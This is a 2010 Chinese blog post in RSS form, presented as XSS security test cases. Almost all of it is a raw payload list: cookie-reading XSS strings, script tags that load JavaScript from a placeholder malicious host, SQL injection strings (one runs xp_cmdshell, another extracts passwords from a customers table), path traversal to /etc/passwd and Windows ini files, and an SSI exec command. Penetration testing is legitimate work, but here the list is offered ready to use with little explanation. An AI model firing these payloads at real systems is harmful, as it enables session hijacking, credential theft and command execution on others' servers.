<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[Heck's  Blog]]></title> 
<link>https://www.heckjj.com/index.php</link> 
<description><![CDATA[一瞬间的决定，往往可以改变很多，事实上，让自己成功的往往不是知识，是精神！ 如果你总是为自己找借口，那只好让成功推迟。执行力，今天！]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[Heck's  Blog]]></copyright>
<item>
<link>https://www.heckjj.com/cross-site-script-bug-safe-test-html/</link>
<title><![CDATA[xss 跨站脚本漏洞安全测试]]></title> 
<author>Heck &lt;@hecks.tk&gt;</author>
<category><![CDATA[黑客攻防]]></category>
<pubDate>Mon, 25 Oct 2010 11:53:25 +0000</pubDate> 
<guid>https://www.heckjj.com/cross-site-script-bug-safe-test-html/</guid> 
<description>
<![CDATA[ 
	&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <span style="font-family: 微软雅黑;">很多网站存在xss 跨站脚本漏洞，下面的安全测试测用例还是挺管用的，能够查找和发现潜在的bug，大家可以试试看吧。&nbsp;&nbsp;<br/>　&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br/>　　=&#039;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br/>　　&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br/>　　&lt;script&gt;alert(vulnerable)&lt;/script&gt;<br/>　　%3Cscript%3Ealert(&#039;XSS&#039;)%3C/script%3E<br/>　　&lt;script&gt;alert(&#039;XSS&#039;)&lt;/script&gt;<br/>　　&lt;img src=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;<br/>　　%0a%0a&lt;script&gt;alert(&#92;&quot;Vulnerable&#92;&quot;)&lt;/script&gt;.jsp<br/>　　%22%3cscript%3ealert(%22x ss%22)%3c/script%3e<br/>　　%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br/>　　%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini<br/>　　%3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e<br/>　　%3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e<br/>　　%3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html<br/>　　&lt;script&gt;alert(&#039;Vulnerable&#039;);&lt;/script&gt;<br/>　　&lt;script&gt;alert(&#039;Vulnerable&#039;)&lt;/script&gt; </span><span style="font-family: 微软雅黑;"><br/>　　?sql_debug=1<br/>　　a%5c.aspx<br/>　　a.jsp/&lt;script&gt;alert(&#039;Vulnerable&#039;)&lt;/script&gt;<br/>　　a?&lt;script&gt;alert(&#039;Vulnerable&#039;)&lt;/script&gt;<br/>　　&quot;&gt;&lt;script&gt;alert(&#039;Vulnerable&#039;)&lt;/script&gt;<br/>　　&#039;;exec%20master..xp_cmdshell%20&#039;dir%20 c:%20&gt;%20c:&#92;inetpub&#92;wwwroot&#92;?.txt&#039;--&amp;&amp;<br/>　　%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E<br/>　　%3Cscript%3Ealert(document. domain);%3C/script%3E&amp;<br/>　　 %3Cscript%3Ealert(document.domain);%3C/script%3E&amp;SESSION_ID=&#123;SESSION_ID&#125;&amp;SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=<br/>　　../../../../../../../../etc/passwd<br/>　　..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;windows&#92;system.ini<br/>　　&#92;..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;..&#92;windows&#92;system.ini<br/>　　&#039;&#039;;!--&quot;&lt;XSS&gt;=&amp;&#123;()&#125;<br/>　　&lt;IMG SRC=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&lt;IMG SRC=javascript:alert(&#039;XSS&#039;)&gt;<br/>　　&lt;IMG SRC=JaVaScRiPt:alert(&#039;XSS&#039;)&gt;<br/>　　&lt;IMG SRC=JaVaScRiPt:alert(&quot;XSS&quot;)&gt;<br/>　　&lt;IMG SRC=javascript:alert(&#039;XSS&#039;)&gt;<br/>　　&lt;IMG SRC=javascript:alert(&#039;XSS&#039;)&gt;<br/>　　&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br/>　　&lt;IMG SRC=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&quot;&lt;IMG SRC=java&#92;0script:alert(&#92;&quot;XSS&#92;&quot;)&gt;&quot;;&#039; &gt; out<br/>　　&lt;IMG SRC=&quot; javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&lt;SCRIPT&gt;a=/XSS/alert(a.source)&lt;/SCRIPT&gt;<br/>　　&lt;BODY BACKGROUND=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;<br/>　　&lt;BODY ONLOAD=alert(&#039;XSS&#039;)&gt;<br/>　　&lt;IMG DYNSRC=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;<br/>　　&lt;IMG LOWSRC=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;<br/>　　&lt;BGSOUND SRC=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&lt;br size=&quot;&amp;&#123;alert(&#039;XSS&#039;)&#125;&quot;&gt;<br/>　　&lt;LAYER SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/layer&gt;<br/>　　&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&lt;IMG SRC=&#039;vbscript:msgbox(&quot;XSS&quot;)&#039;&gt;<br/>　　&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;<br/>　　&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;<br/>　　&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&lt;IFRAME SRC=javascript:alert(&#039;XSS&#039;)&gt;&lt;/IFRAME&gt;<br/>　　&lt;FRAMESET&gt;&lt;FRAME SRC=javascript:alert(&#039;XSS&#039;)&gt;&lt;/FRAME&gt;&lt;/FRAMESET&gt;<br/>　　&lt;TABLE BACKGROUND=&quot;javascript:alert(&#039;XSS&#039;)&quot;&gt;<br/>　　&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&#039;XSS&#039;))&quot;&gt;<br/>　　&lt;DIV STYLE=&quot;behaviour: url(&#039;http://恶意网址/exploit.html&#039;);&quot;&gt;<br/>　　&lt;DIV STYLE=&quot;width: expression(alert(&#039;XSS&#039;));&quot;&gt;<br/>　　&lt;STYLE&gt;@im&#92;port&#039;&#92;ja&#92;vasc&#92;ript:alert(&quot;XSS&quot;)&#039;;&lt;/STYLE&gt;<br/>　　&lt;IMG STYLE=&#039;x ss:expre&#92;ssion(alert(&quot;XSS&quot;))&#039;&gt;<br/>　　&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&#039;XSS&#039;);&lt;/STYLE&gt;<br/>　　&lt;STYLE TYPE=&quot;text/css&quot;&gt;.XSS&#123;background-image:url(&quot;javascript:alert(&#039;XSS&#039;)&quot;);&#125;&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;<br/>　　&lt;STYLE type=&quot;text/css&quot;&gt;BODY&#123;background:url(&quot;javascript:alert(&#039;XSS&#039;)&quot;)&#125;&lt;/STYLE&gt;<br/>　　&lt;BASE HREF=&quot;javascript:alert(&#039;XSS&#039;);//&quot;&gt;<br/>　　getURL(&quot;javascript:alert(&#039;XSS&#039;)&quot;)<br/>　　a=&quot;get&quot;;b=&quot;URL&quot;;c=&quot;javascript:&quot;;d=&quot;alert(&#039;XSS&#039;);&quot;;eval(a+b+c+d);<br/>　　&lt;XML SRC=&quot;javascript:alert(&#039;XSS&#039;);&quot;&gt;<br/>　　&quot;&gt; &lt;BODY ONLOAD=&quot;a();&quot;&gt;&lt;SCRIPT&gt;function a()&#123;alert(&#039;XSS&#039;);&#125;&lt;/SCRIPT&gt;&lt;&quot;<br/>　　&lt;SCRIPT SRC=&quot;http://恶意网址/x ss.jpg&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;IMG SRC=&quot;javascript:alert(&#039;XSS&#039;)&quot;<br/>　　&lt;!--#exec cmd=&quot;/bin/echo &#039;&lt;SCRIPT SRC&#039;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &#039;=http://恶意网址/a.js&gt;&lt;/SCRIPT&gt;&#039;&quot;--&gt;<br/>　　&lt;IMG SRC=&quot;http://恶意网址/somecommand.php?somevariables=maliciouscode&quot;&gt;<br/>　　&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;SCRIPT =&quot;&gt;&quot; SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;SCRIPT a=&quot;&gt;&quot; &#039;&#039; SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;SCRIPT &quot;a=&#039;&gt;&#039;&quot; SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://恶意网址/a.js&quot;&gt;&lt;/SCRIPT&gt;<br/>　　&lt;A HREF=http://恶意网址/&gt;link&lt;/A&gt;<br/>　　admin&#039;--<br/>　　&#039; or 0=0 --<br/>　　&quot; or 0=0 --<br/>　　or 0=0 --<br/>　　&#039; or 0=0 #<br/>　　&quot; or 0=0 #<br/>　　or 0=0 #<br/>　　&#039; or &#039;x&#039;=&#039;x<br/>　　&quot; or &quot;x&quot;=&quot;x<br/>　　&#039;) or (&#039;x&#039;=&#039;x<br/>　　&#039; or 1=1--<br/>　　&quot; or 1=1--<br/>　　or 1=1--<br/>　　&#039; or a=a--<br/>　　&quot; or &quot;a&quot;=&quot;a<br/>　　&#039;) or (&#039;a&#039;=&#039;a<br/>　　&quot;) or (&quot;a&quot;=&quot;a<br/>　　hi&quot; or &quot;a&quot;=&quot;a<br/>　　hi&quot; or 1=1 --<br/>　　hi&#039; or 1=1 --<br/>　　hi&#039; or &#039;a&#039;=&#039;a<br/>　　hi&#039;) or (&#039;a&#039;=&#039;a<br/>　　hi&quot;) or (&quot;a&quot;=&quot;aXSS测试语法&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;</span><br/>Tags - <a href="https://www.heckjj.com/tags/xss/" rel="tag">xss</a> , <a href="https://www.heckjj.com/tags/css/" rel="tag">css</a> , <a href="https://www.heckjj.com/tags/%25E8%25B7%25A8%25E7%25AB%2599%25E8%2584%259A%25E6%259C%25AC%25E6%25BC%258F%25E6%25B4%259E/" rel="tag">跨站脚本漏洞</a> , <a href="https://www.heckjj.com/tags/%25E5%25AE%2589%25E5%2585%25A8%25E6%25B5%258B%25E8%25AF%2595/" rel="tag">安全测试</a>
]]>
</description>
</item><item>
<link>https://www.heckjj.com/cross-site-script-bug-safe-test-html/#blogcomment</link>
<title><![CDATA[[评论] xss 跨站脚本漏洞安全测试]]></title> 
<author> &lt;user@domain.com&gt;</author>
<category><![CDATA[评论]]></category>
<pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> 
<guid>https://www.heckjj.com/cross-site-script-bug-safe-test-html/#blogcomment</guid> 
<description>
<![CDATA[ 
	
]]>
</description>
</item>
</channel>
</rss>